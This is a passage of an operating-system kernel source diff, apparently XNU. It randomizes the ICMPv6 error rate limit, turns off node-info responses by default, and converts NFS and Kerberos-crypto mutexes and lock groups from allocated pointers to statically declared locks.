        uuid_t          t_fsw_uuid;
        uuid_t          t_flow_uuid;
 };
@@ -1227,7 +1232,7 @@ struct  xtcpcb {
        u_quad_t        xt_alignment_hack;
 };
 
-#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
+#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
 
 struct  xtcpcb64 {
        u_int32_t               xt_len;
@@ -1308,7 +1313,7 @@ struct  xtcpcb64 {
        u_quad_t                xt_alignment_hack;
 };
 
-#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
+#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
 
 #ifdef PRIVATE
 
@@ -1497,6 +1502,7 @@ extern uint32_t tcp_do_autorcvbuf;
 extern uint32_t tcp_autorcvbuf_max;
 extern int tcp_recv_bg;
 extern int tcp_do_ack_compression;
+extern int tcp_randomize_timestamps;
 /*
  * Dummy value used for when there is no flow and we want to ensure that compression
  * can happen.
index e789cb7bc5ace708ce3f310ca68343b85fd5a774..f8214f1323a07fa83e0b6e27de817136901f6bb1 100644 (file)
@@ -2346,12 +2346,8 @@ udp_disconnect(struct socket *so)
        struct inpcb *inp;
 
        inp = sotoinpcb(so);
-       if (inp == NULL
-#if NECP
-           || (necp_socket_should_use_flow_divert(inp))
-#endif /* NECP */
-           ) {
-               return inp == NULL ? EINVAL : EPROTOTYPE;
+       if (inp == NULL) {
+               return EINVAL;
        }
        if (inp->inp_faddr.s_addr == INADDR_ANY) {
                return ENOTCONN;
index 08954c8ef688dc342ffa93a72b70748ec1b8ebb0..6e276598c69b8e4f5367cf91491243ed030c21de 100644 (file)
@@ -148,6 +148,7 @@ struct icmp6stat icmp6stat;
 
 extern struct inpcbhead ripcb;
 extern int icmp6errppslim;
+extern int icmp6errppslim_random_incr;
 extern int icmp6rappslim;
 static int icmp6errpps_count = 0;
 static int icmp6rapps_count = 0;
@@ -186,6 +187,11 @@ icmp6_init(struct ip6protosw *pp, struct domain *dp)
        if (!icmp6_initialized) {
                icmp6_initialized = 1;
                mld_init();
+               if (icmp6errppslim >= 0 &&
+                   icmp6errppslim_random_incr > 0 &&
+                   icmp6errppslim <= INT32_MAX - (icmp6errppslim_random_incr + 1)) {
+                       icmp6errppslim += (random() % icmp6errppslim_random_incr) + 1;
+               }
        }
 }
 
@@ -3296,8 +3302,17 @@ icmp6_ratelimit(
                }
        } else if (!ppsratecheck(&icmp6errppslim_last, &icmp6errpps_count,
            icmp6errppslim)) {
-               /* The packet is subject to rate limit */
-               ret++;
+               /*
+                * We add some randomness here to still generate ICMPv6 error
+                * post icmp6errppslim limit with a probability that goes down
+                * with increased value of icmp6errpps_count.
+                */
+               if (icmp6errpps_count > 0 && icmp6errppslim > 0 &&
+                   icmp6errpps_count > icmp6errppslim &&
+                   (random() % (icmp6errpps_count - icmp6errppslim)) != 0) {
+                       /* The packet is subject to rate limit */
+                       ret++;
+               }
        }
 
        return ret;
index 6ee55d379576f13e3c6c01bcab816d140119875c..f64ee80af4379b1f3693ca4d513d0d7c2076314a 100644 (file)
@@ -485,9 +485,11 @@ u_int32_t       rip6_recvspace = RIPV6RCVQ;
 /* ICMPV6 parameters */
 int     icmp6_rediraccept = 1;          /* accept and process redirects */
 int     icmp6_redirtimeout = 10 * 60;   /* 10 minutes */
-int     icmp6errppslim = 500;           /* 500 packets per second */
+uint32_t     icmp6errppslim = 500;           /* 500 packets per second */
+uint32_t     icmp6errppslim_random_incr = 500; /* We further randomize icmp6errppslim
+                                                *  with this during icmpv6 initialization*/
 int     icmp6rappslim = 10;             /* 10 packets per second */
-int     icmp6_nodeinfo = 3;             /* enable/disable NI response */
+int     icmp6_nodeinfo = 0;             /* enable/disable NI response */
 
 /* UDP on IP6 parameters */
 int     udp6_sendspace = 9216;          /* really max datagram size */
@@ -749,6 +751,8 @@ SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_NODEINFO,
     nodeinfo, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6_nodeinfo, 0, "");
 SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ERRPPSLIMIT,
     errppslimit, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6errppslim, 0, "");
+SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ERRPPSLIMIT_RANDOM_INCR,
+    errppslimit_random_incr, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6errppslim_random_incr, 0, "");
 SYSCTL_INT(_net_inet6_icmp6, OID_AUTO,
     rappslimit, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6rappslim, 0, "");
 SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ND6_DEBUG,
index d0a36689a8bbfa1a13ed6aab54336d33ef728a5c..91a87a8a89697ed90f805ece330744432049e479 100644 (file)
@@ -71,7 +71,7 @@
 #include <libkern/OSAtomic.h>
 #include "gss_krb5_mech.h"
 
-lck_grp_t *gss_krb5_mech_grp;
+LCK_GRP_DECLARE(gss_krb5_mech_grp, "gss_krb5_mech");
 
 typedef struct crypt_walker_ctx {
        size_t length;
@@ -198,7 +198,6 @@ gss_krb5_mech_init(void)
                }
                return;
        }
-       gss_krb5_mech_grp = lck_grp_alloc_init("gss_krb5_mech", LCK_GRP_ATTR_NULL);
        gss_krb5_mech_initted = GSS_KRB5_INITIALIZED;
 }
 
@@ -578,12 +577,12 @@ krb5_mic(crypto_ctx_t ctx, gss_buffer_t header, gss_buffer_t bp, gss_buffer_t tr
 
        if (ikey) {
                if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
-                       lck_mtx_lock(ctx->lock);
+                       lck_mtx_lock(&ctx->lock);
                        if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
                                cc_key_schedule_create(ctx);
                        }
                        ctx->flags |= CRYPTO_KS_ALLOCED;
-                       lck_mtx_unlock(ctx->lock);
+                       lck_mtx_unlock(&ctx->lock);
                }
                key2use = ctx->ks.ikey[kdx];
        } else {
@@ -625,12 +624,12 @@ krb5_mic_mbuf(crypto_ctx_t ctx, gss_buffer_t header,
 
        if (ikey) {
                if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
-                       lck_mtx_lock(ctx->lock);
+                       lck_mtx_lock(&ctx->lock);
                        if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
                                cc_key_schedule_create(ctx);
                        }
                        ctx->flags |= CRYPTO_KS_ALLOCED;
-                       lck_mtx_unlock(ctx->lock);
+                       lck_mtx_unlock(&ctx->lock);
                }
                key2use = ctx->ks.ikey[kdx];
        } else {
@@ -679,12 +678,12 @@ krb5_crypt_mbuf(crypto_ctx_t ctx, mbuf_t *mbp, size_t len, int encrypt, cccbc_ct
        int error;
 
        if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
-               lck_mtx_lock(ctx->lock);
+               lck_mtx_lock(&ctx->lock);
                if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
                        cc_key_schedule_create(ctx);
                }
                ctx->flags |= CRYPTO_KS_ALLOCED;
-               lck_mtx_unlock(ctx->lock);
+               lck_mtx_unlock(&ctx->lock);
        }
        if (!ks) {
                ks = encrypt ? ctx->ks.enc : ctx->ks.dec;
@@ -989,6 +988,8 @@ cc_key_schedule_create(crypto_ctx_t ctx)
 void
 gss_crypto_ctx_free(crypto_ctx_t ctx)
 {
+       lck_mtx_destroy(&ctx->lock, &gss_krb5_mech_grp);
+
        ctx->ks.ikey[GSS_SND] = NULL;
        if (ctx->ks.ikey[GSS_RCV] && ctx->key != ctx->ks.ikey[GSS_RCV]) {
                cc_clear(ctx->keylen, ctx->ks.ikey[GSS_RCV]);
@@ -1074,7 +1075,7 @@ gss_crypto_ctx_init(struct crypto_ctx *ctx, lucid_context_t lucid)
                return ENOTSUP;
        }
 
-       ctx->lock = lck_mtx_alloc_init(gss_krb5_mech_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&ctx->lock, &gss_krb5_mech_grp, LCK_ATTR_NULL);
 
        return 0;
 }
index bf00a65a27e87ca74a0fd7b1333bbe577f27600e..a41e778beff657fd6cdb1c6e820df77124f12a06 100644 (file)
@@ -236,7 +236,7 @@ typedef struct crypto_ctx {
        uint32_t etype;
        uint32_t flags;
        size_t mpad;             /* Message padding */
-       lck_mtx_t *lock;
+       lck_mtx_t lock;
        lucid_context_t gss_ctx;  /* Back pointer to lucid context */
        void *key;   /* Points to session key from lucid context */
        const struct ccdigest_info *di;
index a27fa20e5ed84de1067392815291c5339e42df1a..53b2fd794455a0e901b38f945ec82ebfe8a24ecd 100644 (file)
@@ -632,7 +632,7 @@ extern uint32_t nfsrv_user_stat_enabled;                /* enable/disable active
 extern uint32_t nfsrv_user_stat_node_count;             /* current count of user stat nodes */
 extern uint32_t nfsrv_user_stat_max_idle_sec;   /* idle seconds (node no longer considered active) */
 extern uint32_t nfsrv_user_stat_max_nodes;              /* active user list size limit */
-extern lck_grp_t *nfsrv_active_user_mutex_group;
+extern lck_grp_t nfsrv_active_user_mutex_group;
 
 /* An active user node represented in the kernel */
 struct nfs_user_stat_node {
@@ -718,7 +718,7 @@ struct nfsrv_fmod {
 #define NFSRVFMODHASH(vp) (((uintptr_t) vp) & nfsrv_fmod_hash)
 extern LIST_HEAD(nfsrv_fmod_hashhead, nfsrv_fmod) * nfsrv_fmod_hashtbl;
 extern u_long nfsrv_fmod_hash;
-extern lck_mtx_t *nfsrv_fmod_mutex;
+extern lck_mtx_t nfsrv_fmod_mutex;
 extern int nfsrv_fmod_pending, nfsrv_fsevents_enabled;
 #endif
 
@@ -988,7 +988,7 @@ struct nfsreq {
  */
 TAILQ_HEAD(nfs_reqqhead, nfsreq);
 extern struct nfs_reqqhead nfs_reqq;
-extern lck_grp_t *nfs_request_grp;
+extern lck_grp_t nfs_request_grp;
 
 #define R_XID32(x)      ((x) & 0xffffffff)
 
@@ -1115,8 +1115,8 @@ extern TAILQ_HEAD(nfsrv_sockhead, nfsrv_sock) nfsrv_socklist, nfsrv_sockwg,
 nfsrv_sockwait, nfsrv_sockwork;
 
 /* lock groups for nfsrv_sock's */
-extern lck_grp_t *nfsrv_slp_rwlock_group;
-extern lck_grp_t *nfsrv_slp_mutex_group;
+extern lck_grp_t nfsrv_slp_rwlock_group;
+extern lck_grp_t nfsrv_slp_mutex_group;
 
 /*
  * One of these structures is allocated for each nfsd.
@@ -1169,15 +1169,15 @@ typedef int (*nfsrv_proc_t)(struct nfsrv_descript *, struct nfsrv_sock *,
     vfs_context_t, mbuf_t *);
 
 /* mutex for nfs server */
-extern lck_mtx_t *nfsd_mutex;
+extern lck_mtx_t nfsd_mutex;
 extern int nfsd_thread_count, nfsd_thread_max;
 
 /* request list mutex */
-extern lck_mtx_t *nfs_request_mutex;
+extern lck_mtx_t nfs_request_mutex;
 extern int nfs_request_timer_on;
 
 /* mutex for nfs client globals */
-extern lck_mtx_t *nfs_global_mutex;
+extern lck_mtx_t nfs_global_mutex;
 
 #if CONFIG_NFS4
 /* NFSv4 callback globals */
@@ -1206,7 +1206,6 @@ int     vtonfsv2_mode(enum vtype, mode_t);
 
 void    nfs_mbuf_init(void);
 
-void    nfs_nhinit(void);
 void    nfs_nhinit_finish(void);
 u_long  nfs_hash(u_char *, int);
 
index 22627a2476971c660a040f9e4e546f2ffa17f0dc..9cc410b44342c4bb42797f7d45fbd5f63249c2db 100644 (file)
@@ -122,7 +122,7 @@ nfs4_init_clientid(struct nfsmount *nmp)
        static uint8_t en0addr[6];
        static uint8_t en0addr_set = 0;
 
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        if (!en0addr_set) {
                ifnet_t interface = NULL;
                error = ifnet_find_by_name("en0", &interface);
@@ -139,7 +139,7 @@ nfs4_init_clientid(struct nfsmount *nmp)
                        ifnet_release(interface);
                }
        }
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 
        MALLOC(ncip, struct nfs_client_id *, sizeof(struct nfs_client_id), M_TEMP, M_WAITOK);
        if (!ncip) {
@@ -185,7 +185,7 @@ nfs4_init_clientid(struct nfsmount *nmp)
        }
 
        /* make sure the ID is unique, and add it to the sorted list */
-       lck_mtx_lock(nfs_global_mutex);
+       lck_mtx_lock(&nfs_global_mutex);
        TAILQ_FOREACH(ncip2, &nfsclientids, nci_link) {
                if (ncip->nci_idlen > ncip2->nci_idlen) {
                        continue;
@@ -220,7 +220,7 @@ nfs4_init_clientid(struct nfsmount *nmp)
                TAILQ_INSERT_TAIL(&nfsclientids, ncip, nci_link);
        }
        nmp->nm_longid = ncip;
-       lck_mtx_unlock(nfs_global_mutex);
+       lck_mtx_unlock(&nfs_global_mutex);
 
        return 0;
 }
@@ -468,7 +468,12 @@ out:
                interval = 1;
        }
        lck_mtx_unlock(&nmp->nm_lock);
-       nfs_interval_timer_start(nmp->nm_renew_timer, interval * 1000);
+
+       lck_mtx_lock(&nmp->nm_timer_lock);
+       if (nmp->nm_renew_timer) {
+               nfs_interval_timer_start(nmp->nm_renew_timer, interval * 1000);
+       }
+       lck_mtx_unlock(&nmp->nm_timer_lock);
 }
 
 /*
index 4e1c7641f04ab82376c5d7a95c68e73ccefa7a62..7a5b838d575a66f8317ea4a099e45560b5cf3c24 100644 (file)
@@ -2003,7 +2003,7 @@ tryagain:
                        return NULL;
                }
                bzero(newnoop, sizeof(*newnoop));
-               lck_mtx_init(&newnoop->noo_lock, nfs_open_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&newnoop->noo_lock, &nfs_open_grp, LCK_ATTR_NULL);
                newnoop->noo_mount = nmp;
                kauth_cred_ref(cred);
                newnoop->noo_cred = cred;
@@ -2039,7 +2039,7 @@ nfs_open_owner_destroy(struct nfs_open_owner *noop)
        if (noop->noo_cred) {
                kauth_cred_unref(&noop->noo_cred);
        }
-       lck_mtx_destroy(&noop->noo_lock, nfs_open_grp);
+       lck_mtx_destroy(&noop->noo_lock, &nfs_open_grp);
        FREE(noop, M_TEMP);
 }
 
@@ -2228,7 +2228,7 @@ alloc:
                        return ENOMEM;
                }
                bzero(newnofp, sizeof(*newnofp));
-               lck_mtx_init(&newnofp->nof_lock, nfs_open_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&newnofp->nof_lock, &nfs_open_grp, LCK_ATTR_NULL);
                newnofp->nof_owner = noop;
                nfs_open_owner_ref(noop);
                newnofp->nof_np = np;
@@ -2272,7 +2272,7 @@ nfs_open_file_destroy(struct nfs_open_file *nofp)
        TAILQ_REMOVE(&nofp->nof_owner->noo_opens, nofp, nof_oolink);
        lck_mtx_unlock(&nofp->nof_owner->noo_lock);
        nfs_open_owner_rele(nofp->nof_owner);
-       lck_mtx_destroy(&nofp->nof_lock, nfs_open_grp);
+       lck_mtx_destroy(&nofp->nof_lock, &nfs_open_grp);
        FREE(nofp, M_TEMP);
 }
 
@@ -3351,7 +3351,7 @@ tryagain:
                        return NULL;
                }
                bzero(newnlop, sizeof(*newnlop));
-               lck_mtx_init(&newnlop->nlo_lock, nfs_open_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&newnlop->nlo_lock, &nfs_open_grp, LCK_ATTR_NULL);
                newnlop->nlo_pid = pid;
                newnlop->nlo_pid_start = p->p_start;
                newnlop->nlo_name = OSAddAtomic(1, &nfs_lock_owner_seqnum);
@@ -3387,7 +3387,7 @@ nfs_lock_owner_destroy(struct nfs_lock_owner *nlop)
                nfs_open_owner_rele(nlop->nlo_open_owner);
                nlop->nlo_open_owner = NULL;
        }
-       lck_mtx_destroy(&nlop->nlo_lock, nfs_open_grp);
+       lck_mtx_destroy(&nlop->nlo_lock, &nfs_open_grp);
        FREE(nlop, M_TEMP);
 }
 
@@ -4199,7 +4199,14 @@ restart:
                        error = EIO;
                }
                if (!error) {
+                       if (busy) {
+                               nfs_open_state_clear_busy(np);
+                               busy = 0;
+                       }
                        error = nmp->nm_funcs->nf_setlock_rpc(np, nofp, newnflp, 0, 0, vfs_context_thread(ctx), vfs_context_ucred(ctx));
+                       if (!busy && !nfs_open_state_set_busy(np, vfs_context_thread(ctx))) {
+                               busy = 1;
+                       }
                }
                if (!error || ((error != NFSERR_DENIED) && (error != NFSERR_GRACE))) {
                        break;
@@ -7479,13 +7486,13 @@ nfs4_vnop_rmdir(
                 * again if another object gets created with the same filehandle
                 * before this vnode gets reclaimed
                 */
-               lck_mtx_lock(nfs_node_hash_mutex);
+               lck_mtx_lock(&nfs_node_hash_mutex);
                if (np->n_hflag & NHHASHED) {
                        LIST_REMOVE(np, n_hash);
                        np->n_hflag &= ~NHHASHED;
                        FSDBG(266, 0, np, np->n_flag, 0xb1eb1e);
                }
-               lck_mtx_unlock(nfs_node_hash_mutex);
+               lck_mtx_unlock(&nfs_node_hash_mutex);
        }
        FREE(dul, M_TEMP);
        return error;
index b9c2b5ac1e773f564de12066f909239ea7b27176..54cd34dc209ebd947c4505168536504fd5e324dd 100644 (file)
@@ -117,10 +117,10 @@ int nfs_nbdwrite;
 int nfs_buf_timer_on = 0;
 thread_t nfsbufdelwrithd = NULL;
 
-ZONE_DECLARE(nfsbuf_zone, "NFS bio", sizeof(struct nfsbuf), ZC_NONE);
+static ZONE_DECLARE(nfsbuf_zone, "NFS bio", sizeof(struct nfsbuf), ZC_NONE);
 
-lck_grp_t *nfs_buf_lck_grp;
-lck_mtx_t *nfs_buf_mutex;
+static LCK_GRP_DECLARE(nfs_buf_lck_grp, "nfs buf");
+LCK_MTX_DECLARE(nfs_buf_mutex, &nfs_buf_lck_grp);
 
 #define NFSBUF_FREE_PERIOD      30      /* seconds */
 #define NFSBUF_LRU_STALE        120
@@ -215,9 +215,6 @@ nfs_buf_pgs_is_set(nfsbufpgs *nfsbp)
 void
 nfs_nbinit(void)
 {
-       nfs_buf_lck_grp = lck_grp_alloc_init("nfs_buf", LCK_GRP_ATTR_NULL);
-       nfs_buf_mutex = lck_mtx_alloc_init(nfs_buf_lck_grp, LCK_ATTR_NULL);
-
        nfsbufcnt = nfsbufmetacnt =
            nfsbuffreecnt = nfsbuffreemetacnt = nfsbufdelwricnt = 0;
        nfsbufmin = 128;
@@ -241,13 +238,13 @@ nfs_buf_timer(__unused void *param0, __unused void *param1)
 {
        nfs_buf_freeup(1);
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        if (nfsbufcnt <= nfsbufmin) {
                nfs_buf_timer_on = 0;
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                return;
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        nfs_interval_timer_start(nfs_buf_timer_call,
            NFSBUF_FREE_PERIOD * 1000);
@@ -266,7 +263,7 @@ nfs_buf_freeup(int timer)
 
        TAILQ_INIT(&nfsbuffreeup);
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
 
        microuptime(&now);
 
@@ -330,7 +327,7 @@ nfs_buf_freeup(int timer)
        FSDBG(320, nfsbufcnt, nfsbuffreecnt, nfsbuffreemetacnt, 0);
        NFSBUFCNTCHK();
 
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        while ((fbp = TAILQ_FIRST(&nfsbuffreeup))) {
                TAILQ_REMOVE(&nfsbuffreeup, fbp, nb_free);
@@ -380,13 +377,13 @@ boolean_t
 nfs_buf_is_incore(nfsnode_t np, daddr64_t blkno)
 {
        boolean_t rv;
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        if (nfs_buf_incore(np, blkno)) {
                rv = TRUE;
        } else {
                rv = FALSE;
        }
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        return rv;
 }
 
@@ -428,7 +425,7 @@ nfs_buf_page_inval(vnode_t vp, off_t offset)
                return ENXIO;
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        bp = nfs_buf_incore(VTONFS(vp), (daddr64_t)(offset / nmp->nm_biosize));
        if (!bp) {
                goto out;
@@ -461,7 +458,7 @@ nfs_buf_page_inval(vnode_t vp, off_t offset)
                }
        }
 out:
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        return error;
 }
 
@@ -658,15 +655,15 @@ nfs_buf_delwri_service(void)
                        TAILQ_INSERT_TAIL(&nfsbufdelwri, bp, nb_free);
                        nfsbufdelwricnt++;
                        nfs_buf_drop(bp);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        nfs_flushcommits(np, 1);
                } else {
                        SET(bp->nb_flags, NB_ASYNC);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        nfs_buf_write(bp);
                }
                i++;
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
        }
 }
 
@@ -679,13 +676,13 @@ nfs_buf_delwri_thread(__unused void *arg, __unused wait_result_t wr)
        struct timespec ts = { .tv_sec = 30, .tv_nsec = 0 };
        int error = 0;
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
        while (!error) {
                nfs_buf_delwri_service();
-               error = msleep(&nfsbufdelwrithd, nfs_buf_mutex, 0, "nfsbufdelwri", &ts);
+               error = msleep(&nfsbufdelwrithd, &nfs_buf_mutex, 0, "nfsbufdelwri", &ts);
        }
        nfsbufdelwrithd = NULL;
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
        thread_terminate(nfsbufdelwrithd);
 }
 
@@ -700,7 +697,7 @@ nfs_buf_delwri_push(int locked)
                return;
        }
        if (!locked) {
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
        }
        /* wake up the delayed write service thread */
        if (nfsbufdelwrithd) {
@@ -713,7 +710,7 @@ nfs_buf_delwri_push(int locked)
                nfs_buf_delwri_service();
        }
        if (!locked) {
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
        }
 }
 
@@ -787,16 +784,16 @@ nfs_buf_get(
        }
 
 loop:
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
 
        /* wait for any buffer invalidation/flushing to complete */
        while (np->n_bflag & NBINVALINPROG) {
                np->n_bflag |= NBINVALWANT;
                ts.tv_sec = 2;
                ts.tv_nsec = 0;
-               msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_buf_get_invalwait", &ts);
+               msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_buf_get_invalwait", &ts);
                if ((error = nfs_sigintr(VTONMP(vp), NULL, thd, 0))) {
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        FSDBG_BOT(541, np, blkno, 0, error);
                        return error;
                }
@@ -810,7 +807,7 @@ loop:
                /* if busy, set wanted and wait */
                if (ISSET(bp->nb_lflags, NBL_BUSY)) {
                        if (flags & NBLK_NOWAIT) {
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                                FSDBG_BOT(541, np, blkno, bp, 0xbcbcbcbc);
                                return 0;
                        }
@@ -819,7 +816,7 @@ loop:
 
                        ts.tv_sec = 2;
                        ts.tv_nsec = 0;
-                       msleep(bp, nfs_buf_mutex, slpflag | (PRIBIO + 1) | PDROP,
+                       msleep(bp, &nfs_buf_mutex, slpflag | (PRIBIO + 1) | PDROP,
                            "nfsbufget", (slpflag == PCATCH) ? NULL : &ts);
                        slpflag = 0;
                        FSDBG_BOT(543, np, blkno, bp, bp->nb_flags);
@@ -843,7 +840,7 @@ loop:
        }
 
        if (flags & NBLK_ONLYVALID) {
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                FSDBG_BOT(541, np, blkno, 0, 0x0000cace);
                return 0;
        }
@@ -982,7 +979,7 @@ loop:
                        nfs_buf_delwri_push(1);
 
                        nfsneedbuffer = 1;
-                       msleep(&nfsneedbuffer, nfs_buf_mutex, PCATCH | PDROP, "nfsbufget", NULL);
+                       msleep(&nfsneedbuffer, &nfs_buf_mutex, PCATCH | PDROP, "nfsbufget", NULL);
                        FSDBG_BOT(546, np, blkno, nfsbufcnt, nfsbufmax);
                        if ((error = nfs_sigintr(VTONMP(vp), NULL, thd, 0))) {
                                FSDBG_BOT(541, np, blkno, 0, error);
@@ -1005,7 +1002,7 @@ loop:
 buffer_setup:
 
        /* unlock hash */
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        switch (operation) {
        case NBLK_META:
@@ -1026,7 +1023,7 @@ buffer_setup:
                if (!bp->nb_data) {
                        /* Ack! couldn't allocate the data buffer! */
                        /* clean up buffer and return error */
-                       lck_mtx_lock(nfs_buf_mutex);
+                       lck_mtx_lock(&nfs_buf_mutex);
                        LIST_REMOVE(bp, nb_vnbufs);
                        bp->nb_vnbufs.le_next = NFSNOLIST;
                        bp->nb_np = NULL;
@@ -1037,7 +1034,7 @@ buffer_setup:
                        }
                        TAILQ_INSERT_HEAD(&nfsbuffree, bp, nb_free);
                        nfsbuffreecnt++;
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        FSDBG_BOT(541, np, blkno, 0xb00, ENOMEM);
                        return ENOMEM;
                }
@@ -1067,7 +1064,7 @@ buffer_setup:
                                /* unable to create upl */
                                /* vm object must no longer exist */
                                /* clean up buffer and return error */
-                               lck_mtx_lock(nfs_buf_mutex);
+                               lck_mtx_lock(&nfs_buf_mutex);
                                LIST_REMOVE(bp, nb_vnbufs);
                                bp->nb_vnbufs.le_next = NFSNOLIST;
                                bp->nb_np = NULL;
@@ -1078,7 +1075,7 @@ buffer_setup:
                                }
                                TAILQ_INSERT_HEAD(&nfsbuffree, bp, nb_free);
                                nfsbuffreecnt++;
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                                FSDBG_BOT(541, np, blkno, 0x2bc, EIO);
                                return EIO;
                        }
@@ -1190,7 +1187,7 @@ pagelist_cleanup_done:
                bp->nb_pagelist = NULL;
        }
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
 
        wakeup_needbuffer = wakeup_buffer = wakeup_nbdwrite = 0;
 
@@ -1273,7 +1270,7 @@ pagelist_cleanup_done:
 
        FSDBG_BOT(548, bp, NBOFF(bp), bp->nb_flags, bp->nb_data);
 
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        if (wakeup_needbuffer) {
                wakeup(&nfsneedbuffer);
@@ -1298,13 +1295,13 @@ nfs_buf_iowait(struct nfsbuf *bp)
 {
        FSDBG_TOP(549, bp, NBOFF(bp), bp->nb_flags, bp->nb_error);
 
-       lck_mtx_lock(nfs_buf_mutex);
+       lck_mtx_lock(&nfs_buf_mutex);
 
        while (!ISSET(bp->nb_flags, NB_DONE)) {
-               msleep(bp, nfs_buf_mutex, PRIBIO + 1, "nfs_buf_iowait", NULL);
+               msleep(bp, &nfs_buf_mutex, PRIBIO + 1, "nfs_buf_iowait", NULL);
        }
 
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        FSDBG_BOT(549, bp, NBOFF(bp), bp->nb_flags, bp->nb_error);
 
@@ -1345,10 +1342,10 @@ nfs_buf_iodone(struct nfsbuf *bp)
                SET(bp->nb_flags, NB_DONE);             /* note that it's done */
                nfs_buf_release(bp, 1);
        } else {                                        /* or just wakeup the buffer */
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                SET(bp->nb_flags, NB_DONE);             /* note that it's done */
                CLR(bp->nb_lflags, NBL_WANTED);
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
                wakeup(bp);
        }
 
@@ -1371,14 +1368,14 @@ nfs_buf_write_delayed(struct nfsbuf *bp)
        if (!ISSET(bp->nb_flags, NB_DELWRI)) {
                SET(bp->nb_flags, NB_DELWRI);
                /* move to dirty list */
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                nfs_nbdwrite++;
                NFSBUFCNTCHK();
                if (bp->nb_vnbufs.le_next != NFSNOLIST) {
                        LIST_REMOVE(bp, nb_vnbufs);
                }
                LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs);
-               lck_mtx_unlock(nfs_buf_mutex);
+               lck_mtx_unlock(&nfs_buf_mutex);
        }
 
        /*
@@ -1489,7 +1486,7 @@ nfs_buf_acquire(struct nfsbuf *bp, int flags, int slpflag, int slptimeo)
                /* the hz value is 100; which leads to 10ms */
                ts.tv_nsec = (slptimeo % 100) * 10  * NSEC_PER_USEC * 1000;
 
-               error = msleep(bp, nfs_buf_mutex, slpflag | (PRIBIO + 1),
+               error = msleep(bp, &nfs_buf_mutex, slpflag | (PRIBIO + 1),
                    "nfs_buf_acquire", &ts);
                if (error) {
                        return error;
